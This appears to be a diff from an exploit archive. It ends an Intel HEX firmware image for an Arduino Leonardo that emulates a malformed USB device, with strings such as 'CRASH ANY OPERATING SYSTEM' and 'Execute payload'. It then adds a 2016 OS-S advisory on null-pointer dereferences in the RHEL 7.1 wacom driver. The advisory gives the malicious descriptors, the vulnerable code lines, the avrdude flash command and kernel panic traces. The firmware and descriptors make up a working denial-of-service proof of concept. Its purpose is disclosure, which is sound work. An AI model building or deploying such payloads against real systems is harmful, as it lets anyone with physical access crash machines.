+:100930000CF09FC00E94D3031F92EF928DE394E0CE +:100940009F938F930E9481068CE0E89E7001112492 +:10095000E0917505F0917605EE0DFF1D89E0DE0151 +:10096000119601900D928A95E1F7C8010E94D30378 +:1009700049E050E0BE016F5F7F4F80E00E94DE03E0 +:100980000F900F900F900F90C12CD12C612C712CD7 +:1009900033E7A32E34E0B32E4AEA842E44E0942EAB +:1009A000E0917505F0917605EE0DFF1D818590E0D3 +:1009B000681679060CF0BAC07F926F92BF92AF9220 +:1009C0000E948106E0917505F0917605EE0DFF1D00 +:1009D000628573856C0D7D1D49E050E080E00E94CA +:1009E000DE030F900F900F900F9000E010E0E09169 +:1009F0007505F0917605EE0DFF1D0284F385E02D5F +:100A0000EC0DFD1D818590E0081719075CF51F931B +:100A10000F939F928F920E948106E0917505F0914D +:100A20007605EE0DFF1D0284F385E02DEC0DFD1D16 +:100A3000C801880F991FA485B585A80FB91F4D91CE +:100A40005C910284F385E02DE80FF91F60817181CC +:100A500080E00E94DE030F5F1F4F0F900F900F90FA +:100A60000F90C5CF8FEF681A780A8EE0C80ED11CA0 +:100A700097CF8FED94E09F938F930E9481060F9004 +:100A80000F9058C0C8012A8B0E94D3032A892130B5 +:100A9000C1F0233009F04EC08C851F928F9389EFEF +:100AA00094E09F938F930E94810642E050E062E8B9 +:100AB00071E080E00E94DE030F900F900F900F9086 +:100AC00035C04091000150E060E071E080E00E949C +:100AD000DE032CC0873071F1883021F481E08093EF +:100AE000F10024C0893011F5937021F5EDE4F1E0B7 +:100AF00081E021E096E38093E9002093EB003491BC +:100B00003093EC009093ED008F5F3196843099F72D +:100B10008EE78093EA001092EA008C85809372053C +:100B200005C0888999890E94D30304C08EEF809301 +:100B3000E80003C081E28093EB0062960FB6F89460 +:100B4000DEBF0FBECDBFDF91CF91FF91EF91BF917F +:100B5000AF919F918F917F916F915F914F913F9155 +:100B60002F911F910F91FF90EF90DF90CF90BF904A +:100B7000AF909F908F907F906F900F900FBE0F90CF +:100B80001F9018951F920F920FB60F9211248F93FA +:100B90009F938091E1001092E10083FF0FC01092BB +:100BA000E90091E09093EB001092EC0092E39093B7 +:100BB000ED001092720598E09093F00082FF1AC049 +:100BC00080917E05882339F080917E058150809345 +:100BD0007E05882369F080917D05882359F08091F6 +:100BE0007D05815080937D05811104C0289A02C043 +:100BF0005D9AF1CF9F918F910F900FBE0F901F9034 +:100C00001895CF93DF93CDB7DEB782E1FE0135961D +:100C1000A0E0B1E001900D928A95E1F78F89988D5F +:100C20009093760580937505898D9A8D90937405C0 +:100C3000809373058B8D9C8D90937C0580937B05B1 +:100C40008D8D9E8D90937A05809379058F8D98A1D7 +:100C500090937805809377051092720581E08093D8 +:100C6000D70080EA8093D80082E189BD09B400FEF4 +:100C7000FDCF61E070E080E090E00E94790280E9C1 +:100C80008093D8008CE08093E2001092E000559AA7 +:100C9000209ADF91CF91089581E08093E00008953C +:100CA0009091C80095FFFCCF8093CE0008951092DC +:100CB000CD0087E68093CC0088E18093C9008EE068 +:100CC0008093CA0008950F931F93CF93DF93EC0195 +:100CD0008C01FE0101900020E9F73197EC1BFD0B20 +:100CE000C8018C1B9D0B8E179F0730F4F801819172 +:100CF0008F010E945006EDCFDF91CF911F910F9190 +:100D00000895CF93DF93CDB7DEB7DA950FB6F89499 +:100D1000DEBF0FBECDBFFE01EB5FFE4F4191519193 +:100D20009F0160E071E0CE0101960E940507CE01AF +:100D300001960E946306D3950FB6F894DEBF0FBEEE +:100D4000CDBFDF91CF9108958F929F92AF92BF92C6 +:100D5000CF92DF92EF92FF920F931F93CF93DF9387 +:100D600000D0CDB7DEB75B0122E535E03F932F938E +:100D700089839A830E9481068981882E9A81992E7F +:100D80000F900F9000E010E08EE5E82E85E0F82E41 +:100D900091E1C92E94E0D92E0A151B05E4F4F40163 +:100DA00081914F0190E09F938F93FF92EF920E9469 +:100DB00081060F5F1F4FC8018F7099270F900F900A +:100DC0000F900F90892B41F7DF92CF920E948106FE +:100DD0000F900F90E1CF81E194E09F938F930E9459 +:100DE00081060F900F900F900F90DF91CF911F9180 +:100DF0000F91FF90EF90DF90CF90BF90AF909F90BA +:100E00008F900895F8940C94E609AEE0B0E0EBE022 +:100E1000F7E00C94BD098C01CA0146E04C831A83AB +:100E2000098377FF02C060E070E8615071097E833A +:100E30006D83A901BC01CE0101960E9431074D814D +:100E40005E8157FD0AC02F813885421753070CF485 +:100E50009A01F801E20FF31F10822E96E4E00C9441 +:100E6000D909ACE0B0E0E7E3F7E00C94AF097C010E +:100E70006B018A01FC0117821682838181FFBDC14B +:100E8000CE0101964C01F7019381F60193FD859106 +:100E900093FF81916F01882309F4ABC1853239F446 +:100EA00093FD859193FF81916F01853229F4B701FC +:100EB00090E00E941909E7CF512C312C20E020321C +:100EC000A0F48B3269F030F4803259F0833269F447 +:100ED00020612CC08D3239F0803339F4216026C076 +:100EE0002260246023C0286021C027FD27C030ED88 +:100EF000380F3A3078F426FF06C0FAE05F9E300DD6 +:100F00001124532E13C08AE0389E300D1124332E45 +:100F100020620CC08E3221F426FD6BC1206406C015 +:100F20008C3611F4206802C0883641F4F60193FD36 +:100F3000859193FF81916F018111C1CF982F9F7D82 +:100F40009554933028F40C5F1F4FFFE3F9830DC0D5 +:100F5000833631F0833771F0833509F05BC022C0EE +:100F6000F801808189830E5F1F4F44244394512CE4 +:100F7000540115C03801F2E06F0E711CF801A08019 +:100F8000B18026FF03C0652D70E002C06FEF7FEFD8 +:100F9000C5012C870E940E092C0183012C852F7717 +:100FA000222E17C03801F2E06F0E711CF801A080EC +:100FB000B18026FF03C0652D70E002C06FEF7FEFA8 +:100FC000C5012C870E9403092C012C852068222E44 +:100FD000830123FC1BC0832D90E048165906B0F412 +:100FE000B70180E290E00E9419093A94F4CFF5012C +:100FF00027FC859127FE81915F01B70190E00E9457 +:10100000190931103A94F1E04F1A51084114510472 +:1010100071F7E5C0843611F0893639F5F80127FFFC +:1010200007C060817181828193810C5F1F4F08C06E +:1010300060817181882777FD8095982F0E5F1F4F03 +:101040002F76B22E97FF09C0909580957095619587 +:101050007F4F8F4F9F4F2068B22E2AE030E0A401CF +:101060000E944B09A82EA81844C0853729F42F7E6A +:10107000B22E2AE030E025C0F22FF97FBF2E8F3646 +:10108000C1F018F4883579F0B4C0803719F088378A +:1010900021F0AFC02F2F2061B22EB4FE0DC08B2DDA +:1010A0008460B82E09C024FF0AC09F2F9660B92E15 +:1010B00006C028E030E005C020E130E002C020E1B9 +:1010C00032E0F801B7FE07C06081718182819381AF +:1010D0000C5F1F4F06C06081718180E090E00E5F61 +:1010E0001F4FA4010E944B09A82EA818FB2DFF77C3 +:1010F000BF2EB6FE0BC02B2D2E7FA51450F4B4FED0 +:101100000AC0B2FC08C02B2D2E7E05C07A2C2B2DD8 +:1011100003C07A2C01C0752C24FF0DC0FE01EA0D1E +:10112000F11D8081803311F4297E09C022FF06C0A1 +:101130007394739404C0822F867809F0739423FD0E +:1011400013C020FF06C05A2C731418F4530C571800 +:10115000732C731468F4B70180E290E02C870E942E +:10116000190973942C85F5CF731410F4371801C046 +:10117000312C24FF12C0B70180E390E02C870E943D +:1011800019092C8522FF17C021FF03C088E590E0D4 +:1011900002C088E790E0B7010CC0822F867859F032 +:1011A00021FD02C080E201C08BE227FD8DE2B70184 +:1011B00090E00E941909A51438F4B70180E390E08B +:1011C0000E9419095A94F7CFAA94F401EA0DF11D6F +:1011D0008081B70190E00E941909A110F5CF33205A +:1011E00009F451CEB70180E290E00E9419093A94C7 +:1011F000F6CFF7018681978102C08FEF9FEF2C9683 +:10120000E2E10C94CB09FC010590615070400110A3 +:10121000D8F7809590958E0F9F1F0895FC0161501F +:10122000704001900110D8F7809590958E0F9F1F08 +:1012300008950F931F93CF93DF93182F092FEB017E +:101240008B8181FD03C08FEF9FEF20C082FF10C014 +:101250004E815F812C813D81421753077CF4E881E8 +:10126000F9819F012F5F3F4F39832883108306C088 +:10127000E885F985812F0995892B29F72E813F81F2 +:101280002F5F3F4F3F832E83812F902FDF91CF9190 +:101290001F910F910895FA01AA27283051F12031AA +:1012A00081F1E8946F936E7F6E5F7F4F8F4F9F4FFA +:1012B000AF4FB1E03ED0B4E03CD0670F781F891F3C +:1012C0009A1FA11D680F791F8A1F911DA11D6A0F0A +:1012D000711D811D911DA11D20D009F468943F91BD +:1012E0002AE0269F11243019305D3193DEF6CF01BC +:1012F0000895462F4770405D4193B3E00FD0C9F782 +:10130000F6CF462F4F70405D4A3318F0495D31FDEE +:101310004052419302D0A9F7EACFB4E0A695979541 +:10132000879577956795BA95C9F700976105710517 +:1013300008959B01AC010A2E069457954795379561 +:101340002795BA95C9F7620F731F841F951FA01DBB +:101350000895EE0FFF1F0590F491E02D09942F9250 +:101360003F924F925F926F927F928F929F92AF9235 +:10137000BF92CF92DF92EF92FF920F931F93CF9382 +:10138000DF93CDB7DEB7CA1BDB0B0FB6F894DEBF19 +:101390000FBECDBF09942A88398848885F846E843F +:1013A0007D848C849B84AA84B984C884DF80EE8089 +:1013B000FD800C811B81AA81B981CE0FD11D0FB692 +:1013C000F894DEBF0FBECDBFED010895F894FFCFB6 +:1013D0001201000200000040AD0BEFBE000101024F +:1013E000000122034200610064002000420041002D +:1013F00042004500250078002500780025006E0099 +:101400002500700018034200410044002000430002 +:101410003000460046004500450021001201000250 +:1014200000000040C505020000010102030109029D +:10143000270001010000FA0705810304040C0705D9 +:10144000010204000C0705820104000C07000700DC +:101450000700480100500072006F006C00690066D0 +:101460000069006300000A550000006BFD180A00C7 +:10147000809F0AB901312B940A8101128946001319 +:10148000000257028B0A5E0AF80A5F01F21201009D +:1014900002010000400D055702000101020301B9DD +:1014A0000A0100F80A5F0A810A220342006100640F +:1014B0000020004200410042004500250078002540 +:1014C00000780025006E00250070001803420041DE +:1014D000004400200043003000460046004500451F +:1014E00000210012010002010000400D055702001A +:1014F000010102030109040000030100000003F2DE +:101500000AEC0A0902270001010000FA01AB0A09EE +:101510000400000301000000090200202020202018 +:101520005F5F5F5F5F5F5F5F2020202020202020C3 +:1015300020202020202020202020202020202020AB +:1015400020205F5F5F5F5F205F5F20205F202020A3 +:101550002020205F5F0A0D00202020202F205F5FC9 +:101560005F5F2F202F5F20205F5F5F5F205F5F5FE7 +:101570005F5F20205F5F5F5F5F20202020202F20A3 +:101580005F5F5F2F2F202F5F285F295F5F5F5F2FD7 +:10159000202F5F5F0A0D002020202F202F202020E9 +:1015A0002F205F5F205C2F205F5F20602F205F5F18 +:1015B000205C2F205F5F5F2F5F5F5F5F205C5F5F5E +:1015C000205C2F205F5F2F202F205F5F5F2F202F59 +:1015D0002F5F2F0A0D0020202F202F5F5F5F2F200D +:1015E0002F202F202F202F5F2F202F202F5F2F2005 +:1015F000285F5F2020292F5F5F5F2F205F5F2F20F4 +:101600002F202F5F2F202F202F5F5F2F202C3C0AB1 +:101610000D0020205C5F5F5F5F2F5F2F202F5F2F0B +:101620005C5F5F2C5F2F5C5F5F5F5F2F5F5F5F5F63 +:101630002F20202020202F5F5F5F5F2F5C5F5F2FB8 +:101640005F2F5C5F5F5F2F5F2F7C5F7C0A0D002048 +:101650003C3C2043485241534820414E59204F5072 +:1016600045524154494E472053595354454D203E0D +:101670003E0A0D00203C3C202863292053657267F8 +:10168000656A20536368756D696C6F20323031353F +:101690002C204F70656E536F7572636520536563C0 +:1016A00075726974792052616C66205370656E6E34 +:1016B0006562657267203E3E0A0D000A3E3E20507C +:1016C0007265737320627574746F6E20746F20730B +:1016D0007461727420657865637574696F6E2E2EFF +:1016E0002E0A0D005B44454255475D2045786563F1 +:1016F000757465207061796C6F616420300A0D002B +:10170000526563762D446174613A0A0D005B44456D +:101710004255475D200953656E6420436F6E6669CC +:101720006775726174696F6E446573637269707412 +:101730006F720928696E6465783A2569292E2E2E04 +:101740000D0A005B44454255475D200953656E64B0 +:1017500020496E74657266616365204465736372C7 +:101760006970746F720928696E7465726661636569 +:101770003A2569292E2E2E0D0A005B444542554715 +:101780005D200953656E6420456E64706F696E74E8 +:101790002044657363726970746F720928656E64A2 +:1017A000706F696E743A2569292E2E2E0D0A005B22 +:1017B00044454255475D203C3C70616E6963206D35 +:1017C0006F64653F3E3E0D0A005B44454255475DF0 +:1017D0002009203E3E20537472696E672044657371 +:1017E00063726970746F72207265717565737420AD +:1017F0002D2073656E64696E67206D616C666F7213 +:101800006D656420737472696E67212073657475E9 +:10181000702E7756616C75654C203D3D2025690D15 +:101820000A005B48455844554D505D0A0D0025306F +:04183000325820000A +:00000001FF diff --git a/platforms/linux/dos/39538.txt b/platforms/linux/dos/39538.txt new file mode 100755 index 000000000..82920ec4f --- /dev/null +++ b/platforms/linux/dos/39538.txt @@ -0,0 +1,1184 @@ +OS-S Security Advisory 2016-11 +Linux wacom multiple Nullpointer Dereferences + +Date: March 4th, 2016 +Authors: Sergej Schumilo, Hendrik Schwartke, Ralf Spenneberg +CVE: not yet assigned +CVSS: 4.9 (AV:L/AC:L/Au:N/C:N/I:N/A:C) +Title: Multiple Local RedHat Enterprise Linux DoS â?? RHEL 7.1 Kernel crashes on +invalid USB device descriptors (wacom driver) +Severity: Critical. The Kernel panics. A reboot is required. +Ease of Exploitation: Trivial +Vulnerability type: Wrong input validation +Products: RHEL 7.1 including all updates +Kernel-Version: 3.10.0-229.20.1.el7.x86_64 (for debugging-purposes we used the +CentOS Kernel kernel-debuginfo-3.10.0-229.14.1.el7) +Vendor: Red Hat +Vendor contacted: November, 12th 2015 +PDF of advisory: https://os-s.net/advisories/OSS-2016-11_wacom.pdf + +Abstract: +The Kernel 3.10.0-229.20.1.el7.x86_64 crashes on presentation of buggy USB +device requiring the wacom driver. + +Detailed product description: +We confirmed the bug on the following system: +RHEL 7.1 +Kernel 3.10.0-229.20.1.el7.x86_64 +Further products or kernel versions have not been tested. +How reproducible: Always +Actual results: Kernel crashes. + +Description: +These bugs were found using the USB-fuzzing framework vUSBf from Sergej +Schumilo +(github.com/schumilo) using the following device descriptors: + +[*] Device-Descriptor #1 +bLength: 0x12 +bDescriptorType: 0x1 +bcdUSB: 0x200 +bDeviceClass: 0x3 +bDeviceSubClass: 0x0 +bDeviceProtocol: 0x0 +bMaxPacketSize: 0x40 +idVendor: 0x56a +idProduct: 0x3 +bcdDevice: 0x100 +iManufacturer: 0x1 +iProduct: 0x2 +iSerialNumbers: 0x3 +bNumConfigurations: 0x1 + +This is the configuration descriptor containing the malicious value for +bNumEndpoints causing the crash. A zero value for bNumEndpoints crashes the +system. + +[*] Configuration-Descriptor +bLength: 0x9 +bDescriptorType: 0x2 +wTotalLength: 0x27 +bNumInterfaces: 0x1 +bConfigurationValue: 0x1 +iConfiguration: 0x0 +bmAttributes: 0x0 +bMaxPower: 0x31 +[*] Interface-Descriptor +bLength: 0x9 +bDescriptorType: 0x4 +bInterfaceNumber: 0x0 +bAlternateSetting: 0x0 +bNumEndpoints: 0x0 +bInterfaceClass: 0x0 +bInterfaceSubClass: 0x0 +bInterfaceProtocol: 0x0 +[*] Endpoint-Descriptor: +bLength: 0x7 +bDescriptorType: 0x5 +bEndpointAddress: 0x81 +bmAttribut: 0x3 +wMaxPacketSize: 0x404 +bInterval: 0xc +[*] Endpoint-Descriptor: +bLength: 0x7 +bDescriptorType: 0x5 +bEndpointAddress: 0x1 +bmAttribut: 0x2 +wMaxPacketSize: 0x4 +bInterval: 0xc +[*] Endpoint-Descriptor: +bLength: 0x7 +bDescriptorType: 0x5 +bEndpointAddress: 0x82 +bmAttribut: 0x2 +wMaxPacketSize: 0x4 +bInterval: 0xc + +The wacom driver assumes that there will be at least one endpoint-descriptor. +If the interface-descriptor contains a zero-value for bNumEndpoints or no +endpoint-descriptor is provided, the driver tries to dereference a null- +pointer and the kernel crashes: + +**** +$ nm wacom.ko.debug | grep wacom_probe +00000000000054a0 t wacom_probe +$ addr2line -e wacom.ko.debug 0x5A22 +/usr/src/debug/kernel-3.10.0-229.14.1.el7/linux-3.10.0-229.14.1.el7.x86_ +64/drivers/input/tablet/wacom_sys.c:1367 +**** + +**** CentOS-Kernel linux-3.10.0-229.14.1.el7 (drivers/input/tablet/wacom- +sys.c) +... +1308 +1309 endpoint = &intf->cur_altsetting->endpoint[0].desc; /* might be null- +pointer */ +1310 +... +1365 +1366 usb_fill_int_urb(wacom->irq, dev, +1367 usb_rcvintpipe(dev, endpoint->bEndpointAddress), /* possible +null-pointer dereference */ +1368 wacom_wac->data, features->pktlen, +1369 wacom_sys_irq, wacom, endpoint->bInterval); +1370 wacom->irq->transfer_dma = wacom->data_dma; +... +**** + +[*] Device-Descriptor #2 +bLength: 0x12 +bDescriptorType: 0x1 +bcdUSB: 0x200 +bDeviceClass: 0x3 +bDeviceSubClass: 0x0 +bDeviceProtocol: 0x0 +bMaxPacketSize: 0x40 +idVendor: 0x56a +idProduct: 0x90 +bcdDevice: 0x100 +iManufacturer: 0x1 +iProduct: 0x2 +iSerialNumbers: 0x3 +bNumConfigurations: 0x1 + +This is the configuration descriptor containing the malicious value for +bNumEndpoints causing the crash. A zero value for bNumEndpoints crashes the +system. + +[*] Configuration-Descriptor +bLength: 0x9 +bDescriptorType: 0x2 +wTotalLength: 0x27 +bNumInterfaces: 0x1 +bConfigurationValue: 0x1 +iConfiguration: 0x0 +bmAttributes: 0x0 +bMaxPower: 0x31 +[*] Interface-Descriptor +bLength: 0x9 +bDescriptorType: 0x4 +bInterfaceNumber: 0x0 +bAlternateSetting: 0x0 +bNumEndpoints: 0x0 +bInterfaceClass: 0x0 +bInterfaceSubClass: 0x0 +bInterfaceProtocol: 0x0 +[*] Endpoint-Descriptor: +bLength: 0x7 +bDescriptorType: 0x5 +bEndpointAddress: 0x81 +bmAttribut: 0x3 +wMaxPacketSize: 0x404 +bInterval: 0xc +[*] Endpoint-Descriptor: +bLength: 0x7 +bDescriptorType: 0x5 +bEndpointAddress: 0x1 +bmAttribut: 0x2 +wMaxPacketSize: 0x4 +bInterval: 0xc +[*] Endpoint-Descriptor: +bLength: 0x7 +bDescriptorType: 0x5 +bEndpointAddress: 0x82 +bmAttribut: 0x2 +wMaxPacketSize: 0x4 +bInterval: 0xc + +The wacom driver assumes that there will be at least one endpoint-descriptor. +If the interface-descriptor contains a zero-value for bNumEndpoints or no +endpoint-descriptor is provided, the driver tries to dereference a null- +pointer and the kernel crashes: + +**** +$ nm wacom.ko.debug | grep wacom_probe +00000000000054a0 t wacom_probe +$ addr2line -e wacom.ko.debug 0x5756 +/usr/src/debug/kernel-3.10.0-229.14.1.el7/linux-3.10.0-229.14.1.el7.x86_ +64/drivers/input/tablet/wacom_sys.c:599 +**** + +**** CentOS-Kernel linux-3.10.0-229.14.1.el7 (drivers/input/tablet/wacom- +sys.c) +... +597 error = usb_get_extra_descriptor(interface, HID_DEVICET_HID, &hid_desc); +598 if (error) { +599 error = usb_get_extra_descriptor(&interface->endpoint[0], /* possible +null-pointer dereference */ +600 HID_DEVICET_REPORT, &hid_desc); +... +**** + +Proof of Concept: +For a proof of concept, we are providing two Arduino Leonardo firmware files. +These firmware files will emulate defective USB devices. + +avrdude -v -p ATMEGA32u4 -c avr109 -P /dev/ttyACM0 -b 57600 -U +flash:w:binary.hex + +Firmware files have been attached to this bug report. +To prevent the automated delivery of the payload, a jumper may be used to +connect port D3 and 3V3! + +Severity and Ease of Exploitation: +Both vulnerabilities can be easily exploited. Using our Arduino Leonardo +firmware files, only physical access to the system is required. + +Vendor Communication: +We contacted Red Hat on the November, 12th 2015. +The upstream driver was recently rebased and thus is not affected. +RHEL related security patches have been provided, but no CVE number was +assigned. + +References: +https://bugzilla.redhat.com/show_bug.cgi?id=1283375 +https://bugzilla.redhat.com/show_bug.cgi?id=1283377 +http://www.spinics.net/lists/linux-input/msg42294.html + +Kernel Stacktrace #1: + +[ 41.611702] usb 1-1: new full-speed USB device number 2 using xhci_hcd +[ 41.821226] usb 1-1: config 1 interface 0 altsetting 0 has 3 endpoint +descriptors, different from the interface descriptor's value: 0 +[ 41.844208] usb 1-1: New USB device found, idVendor=056a, idProduct=0003 +[ 41.849572] usb 1-1: New USB device strings: Mfr=1, Product=2, +SerialNumber=3 +[ 41.855326] usb 1-1: Product: Ä? +[ 41.859442] usb 1-1: Manufacturer: Ä? +[ 41.863456] usb 1-1: SerialNumber: % +[ 41.916320] BUG: unable to handle kernel NULL pointer dereference at +0000000000000002 +[ 41.917021] IP: [] wacom_probe+0x582/0xec0 [wacom] +[ 41.917021] PGD 0 +[ 41.917021] Oops: 0000 [#1] SMP +[ 41.917021] Modules linked in: wacom(+) ip6t_rpfilter ip6t_REJECT ipt_REJECT +xt_conntrack ebtable_nat ebtable_broute bridge stp llc ebtable_filter ebtables +ip6table_nat nf_conntrack_ipv6 nf_defrag_ipv6 nf_nat_ipv6 ip6table_mangle +ip6table_security ip6table_raw ip6table_filter ip6_tables iptable_nat +nf_conntrack_ipv4 nf_defrag_ipv4 nf_nat_ipv4 nf_nat nf_conntrack +iptable_mangle iptable_security iptable_raw iptable_filter ip_tables bochs_drm +ppdev syscopyarea sysfillrect sysimgblt ttm drm_kms_helper drm pcspkr i2c_piix4 +i2c_core serio_raw parport_pc parport xfs libcrc32c sd_mod sr_mod crc_t10dif +cdrom crct10dif_common ata_generic pata_acpi ata_piix libata e1000 floppy +dm_mirror dm_region_hash dm_log dm_mod +[ 41.917021] CPU: 0 PID: 2220 Comm: systemd-udevd Not tainted +3.10.0-229.14.1.el7.x86_64 #1 +[ 41.917021] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS +rel-1.8.2-0-g33fbe13 by qemu-project.org 04/01/2014 +[ 41.917021] task: ffff88000bcfa220 ti: ffff88000bd20000 task.ti: ffff88000bd20000 +[ 41.917021] RIP: 0010:[] [] +wacom_probe+0x582/0xec0 [wacom] +[ 41.917021] RSP: 0018:ffff88000bd23b58 EFLAGS: 00010246 +[ 41.917021] RAX: 0000000000000000 RBX: ffff88000c525800 RCX: 0000000000000000 +[ 41.917021] RDX: 0000000000000004 RSI: 0000000000000008 RDI: ffff88000ca75000 +[ 41.917021] RBP: ffff88000bd23be0 R08: 000000000000000d R09: 0000000000000064 +[ 41.917021] R10: 0000000000000064 R11: ffffffff810020d8 R12: ffff88000bcd0090 +[ 41.917021] R13: ffff88000bcd0000 R14: ffff88000c525c20 R15: ffff88000c525c00 +[ 41.917021] FS: 00007fb8082b4880(0000) GS:ffff88000fc00000(0000) +knlGS:0000000000000000 +[ 41.917021] CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b +[ 41.917021] CR2: 0000000000000002 CR3: 000000000bd05000 CR4: +00000000000006f0 +[ 41.917021] DR0: 0000000000000000 DR1: 0000000000000000 DR2: +0000000000000000 +[ 41.917021] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 +[ 41.917021] Stack: +[ 41.917021] ffff88000bd23bb0 00000000dca45828 ffff88000bcd0090 +0000000000000004 +[ 41.917021] ffff88000bcd0138 0000000000000202 0000000000000001 +0000000000000246 +[ 41.917021] 0000000000000000 ffff88000000000d 0000000000000202 +00000000dca45828 +[ 41.917021] Call Trace: +[ 41.917021] [] usb_probe_interface+0x1c4/0x2f0 +[ 41.917021] [] driver_probe_device+0x87/0x390 +[ 41.917021] [] __driver_attach+0x93/0xa0 +[ 41.917021] [] ? __device_attach+0x40/0x40 +[ 41.917021] [] bus_for_each_dev+0x73/0xc0 +[ 41.917021] [] driver_attach+0x1e/0x20 +[ 41.917021] [] bus_add_driver+0x200/0x2d0 +[ 41.917021] [] driver_register+0x64/0xf0 +[ 41.917021] [] usb_register_driver+0x82/0x160 +[ 41.917021] [] ? 0xffffffffa03a3fff +[ 41.917021] [] wacom_driver_init+0x1e/0x1000 [wacom] +[ 41.917021] [] do_one_initcall+0xb8/0x230 +[ 41.917021] [] load_module+0x133e/0x1b40 +[ 41.917021] [] ? ddebug_proc_write+0xf0/0xf0 +[ 41.917021] [] ? copy_module_from_fd.isra.42+0x53/0x150 +[ 41.917021] [] SyS_finit_module+0xa6/0xd0 +[ 41.917021] [] system_call_fastpath+0x16/0x1b +[ 41.917021] Code: 84 0f 08 00 00 48 83 c0 20 48 c7 c7 20 f4 39 a0 49 89 87 +d8 00 00 00 e8 4d f1 26 e1 48 8b 45 b8 41 8b b7 88 00 00 00 49 8b 7f 60 <0f> +b6 50 02 0f b6 48 06 41 8b 84 24 70 ff ff ff c1 e2 0f c1 e0 +[ 41.917021] RIP [] wacom_probe+0x582/0xec0 [wacom] +[ 41.917021] RSP +[ 41.917021] CR2: 0000000000000002 +[ 42.331382] ---[ end trace b239663354a1c556 ]--- +[ 42.336544] Kernel panic - not syncing: Fatal exception +[ 42.337520] drm_kms_helper: panic occurred, switching back to text console + +Kernel Stacktrace #2: + +[ 34.781297] usb 1-1: new full-speed USB device number 2 using xhci_hcd +[ 34.986458] usb 1-1: config 1 interface 0 altsetting 0 has 3 endpoint +descriptors, different from the interface descriptor's value: 0 +[ 35.014291] usb 1-1: New USB device found, idVendor=056a, idProduct=0090 +[ 35.021605] usb 1-1: New USB device strings: Mfr=1, Product=2, +SerialNumber=3 +[ 35.029627] usb 1-1: Product: Ä? +[ 35.034093] usb 1-1: Manufacturer: Ä? +[ 35.037368] usb 1-1: SerialNumber: % +[ 35.091600] BUG: unable to handle kernel NULL pointer dereference at +0000000000000038 +[ 35.092021] IP: [] wacom_probe+0x2b6/0xec0 [wacom] +[ 35.092021] PGD 0 +[ 35.092021] Oops: 0000 [#1] SMP +[ 35.092021] Modules linked in: wacom(+) ip6t_rpfilter ip6t_REJECT ipt_REJECT +xt_conntrack ebtable_nat ebtable_broute bridge stp llc ebtable_filter ebtables +ip6table_nat nf_conntrack_ipv6 nf_defrag_ipv6 nf_nat_ipv6 ip6table_mangle +ip6table_security ip6table_raw ip6table_filter ip6_tables iptable_nat +nf_conntrack_ipv4 nf_defrag_ipv4 nf_nat_ipv4 nf_nat nf_conntrack +iptable_mangle iptable_security iptable_raw iptable_filter ip_tables bochs_drm +ppdev syscopyarea sysfillrect sysimgblt ttm drm_kms_helper drm pcspkr i2c_piix4 +i2c_core serio_raw parport_pc parport xfs libcrc32c sd_mod sr_mod crc_t10dif +cdrom crct10dif_common ata_generic pata_acpi ata_piix libata e1000 floppy +dm_mirror dm_region_hash dm_log dm_mod +[ 35.092021] CPU: 0 PID: 2220 Comm: systemd-udevd Not tainted +3.10.0-229.14.1.el7.x86_64 #1 +[ 35.092021] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS +rel-1.8.2-0-g33fbe13 by qemu-project.org 04/01/2014 +[ 35.092021] task: ffff88000bcfa220 ti: ffff88000bd20000 task.ti: ffff88000bd20000 +[ 35.092021] RIP: 0010:[] [] +wacom_probe+0x2b6/0xec0 [wacom] +[ 35.092021] RSP: 0018:ffff88000bd23b58 EFLAGS: 00010286 +[ 35.092021] RAX: 0000000000000000 RBX: ffff88000c525800 RCX: ffff88000bd23ba8 +[ 35.092021] RDX: 0000000000000022 RSI: 0000000000000000 RDI: ffff88000f508692 +[ 35.092021] RBP: ffff88000bd23be0 R08: ffff88000bd72553 R09: 0000000000000064 +[ 35.092021] R10: 0000000000000064 R11: ffffffff810020d8 R12: ffff88000bcd0090 +[ 35.092021] R13: ffff88000bcd0000 R14: ffff88000f508bc8 R15: ffff88000bd72400 +[ 35.092021] FS: 00007fb8082b4880(0000) GS:ffff88000fc00000(0000) +knlGS:0000000000000000 +[ 35.092021] CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b +[ 35.092021] CR2: 0000000000000038 CR3: 000000000d6a6000 CR4: +00000000000006f0 +[ 35.092021] DR0: 0000000000000000 DR1: 0000000000000000 DR2: +0000000000000000 +[ 35.092021] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 +[ 35.092021] Stack: +[ 35.092021] ffff88000bd23bb0 0000000065aed7a7 ffff88000bcd0090 +0000000000000004 +[ 35.092021] ffff88000bcd0138 0000000000000202 0000000000000001 +0000000000000246 +[ 35.092021] 0000000000000000 ffff88000bd23be0 0000000000000202 +0000000065aed7a7 +[ 35.092021] Call Trace: +[ 35.092021] [] usb_probe_interface+0x1c4/0x2f0 +[ 35.092021] [] driver_probe_device+0x87/0x390 +[ 35.092021] [] __driver_attach+0x93/0xa0 +[ 35.092021] [] ? __device_attach+0x40/0x40 +[ 35.092021] [] bus_for_each_dev+0x73/0xc0 +[ 35.092021] [] driver_attach+0x1e/0x20 +[ 35.092021] [] bus_add_driver+0x200/0x2d0 +[ 35.092021] [] driver_register+0x64/0xf0 +[ 35.092021] [] usb_register_driver+0x82/0x160 +[ 35.092021] [] ? 0xffffffffa03a3fff +[ 35.092021] [] wacom_driver_init+0x1e/0x1000 [wacom] +[ 35.092021] [] do_one_initcall+0xb8/0x230 +[ 35.092021] [] load_module+0x133e/0x1b40 +[ 35.092021] [] ? ddebug_proc_write+0xf0/0xf0 +[ 35.092021] [] ? copy_module_from_fd.isra.42+0x53/0x150 +[ 35.092021] [] SyS_finit_module+0xa6/0xd0 +[ 35.092021] [] system_call_fastpath+0x16/0x1b +[ 35.092021] Code: 05 01 00 00 41 8b 76 0c 49 8b 7e 10 48 8d 4d c8 ba 21 00 +00 00 e8 cb 2c 07 e1 85 c0 74 24 49 8b 46 18 48 8d 4d c8 ba 22 00 00 00 <8b> +70 38 48 8b 78 30 e8 ae 2c 07 e1 85 c0 41 89 c6 0f 85 b2 07 +[ 35.092021] RIP [] wacom_probe+0x2b6/0xec0 [wacom] +[ 35.092021] RSP +[ 35.092021] CR2: 0000000000000038 +[ 35.492030] ---[ end trace b239663354a1c556 ]--- +[ 35.497540] Kernel panic - not syncing: Fatal exception +[ 35.498503] drm_kms_helper: panic occurred, switching back to text 